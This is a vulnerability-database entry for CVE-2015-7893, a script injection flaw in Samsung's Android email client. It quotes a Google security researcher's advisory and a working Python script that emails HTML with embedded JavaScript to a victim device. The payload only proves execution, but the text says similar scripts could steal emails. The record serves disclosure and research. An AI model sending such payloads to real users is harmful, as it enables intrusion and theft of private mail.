ID

VAR-E-201510-0033


CVE

cve_id:CVE-2015-7893

Trust: 3.0

sources: BID: 77431 // PACKETSTORM: 135643 // EXPLOIT-DB: 38554 // EDBNET: 59635 // EDBNET: 24042

EDB ID

38554


TITLE

Samsung SecEmailUI - Script Injection - Android remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38554

DESCRIPTION

Samsung SecEmailUI - Script Injection. CVE-2015-7893CVE-129520 . remote exploit for Android platform

Trust: 0.6

sources: EXPLOIT-DB: 38554

AFFECTED PRODUCTS

vendor:samsungmodel:secemailuiscope: - version: -

Trust: 1.0

vendor:samsungmodel:secemailui scriptscope: - version: -

Trust: 0.5

vendor:samsungmodel:galaxy s6scope:eqversion:0

Trust: 0.3

sources: BID: 77431 // PACKETSTORM: 135643 // EXPLOIT-DB: 38554

EXPLOIT

# Source: https://code.google.com/p/google-security-research/issues/detail?id=494

'''
The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events.

At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully.

This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server.

Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed.
'''

#!/usr/bin/env python

import smtplib

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Change the details here appropriate to your configuration
me = "attacker@gmail.com"
me_password = "THIS IS NOT REAL"
you = "project.zero.test@gmail.com"
smtp_server = "smtp.gmail.com"

msg = MIMEMultipart('alternative')
msg['Subject'] = "Hello There!"
msg['From'] = me
msg['To'] = you

text = "Hello There!"
html = """\
<html>
<head></head>
<body>
<p>
<script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script>
</p>
</body>
</html>
"""

part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

msg.attach(part1)
msg.attach(part2)

s = smtplib.SMTP_SSL(smtp_server)
s.login(me, me_password)
s.sendmail(me, you, msg.as_string())
s.quit()

Trust: 1.0

sources: EXPLOIT-DB: 38554

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 38554

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38554

TYPE

Script Injection

Trust: 1.0

sources: EXPLOIT-DB: 38554

TAGS

tag:exploit

Trust: 0.5

tag:arbitrary

Trust: 0.5

tag:javascript

Trust: 0.5

sources: PACKETSTORM: 135643

CREDITS

Google Security Research

Trust: 0.6

sources: EXPLOIT-DB: 38554

EXTERNAL IDS

db:NVDid:CVE-2015-7893

Trust: 3.0

db:EXPLOIT-DBid:38554

Trust: 1.6

db:EDBNETid:59635

Trust: 0.6

db:0DAYTODAYid:24437

Trust: 0.6

db:EDBNETid:24042

Trust: 0.6

db:PACKETSTORMid:135643

Trust: 0.5

db:BIDid:77431

Trust: 0.3

sources: BID: 77431 // PACKETSTORM: 135643 // EXPLOIT-DB: 38554 // EDBNET: 59635 // EDBNET: 24042

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2015-7893

Trust: 2.7

url:https://code.google.com/p/google-security-research/issues/detail?id=494

Trust: 1.0

url:https://www.exploit-db.com/exploits/38554/

Trust: 0.6

url:https://0day.today/exploits/24437

Trust: 0.6

url:https://code.google.com/p/google-security-research/issues/detail?id=494&q=samsung

Trust: 0.3

url:http://www.samsung.com/

Trust: 0.3

url:http://googleprojectzero.blogspot.ie/2015/11/hack-galaxy-hunting-bugs-in-samsung.html

Trust: 0.3

sources: BID: 77431 // PACKETSTORM: 135643 // EXPLOIT-DB: 38554 // EDBNET: 59635 // EDBNET: 24042

SOURCES

db:BIDid:77431
db:PACKETSTORMid:135643
db:EXPLOIT-DBid:38554
db:EDBNETid:59635
db:EDBNETid:24042

LAST UPDATE DATE

2022-07-27T09:15:26.745000+00:00


SOURCES UPDATE DATE

db:BIDid:77431date:2015-11-02T00:00:00

SOURCES RELEASE DATE

db:BIDid:77431date:2015-11-02T00:00:00
db:PACKETSTORMid:135643date:2016-02-07T19:33:22
db:EXPLOIT-DBid:38554date:2015-10-28T00:00:00
db:EDBNETid:59635date:2015-10-28T00:00:00
db:EDBNETid:24042date:2015-10-28T00:00:00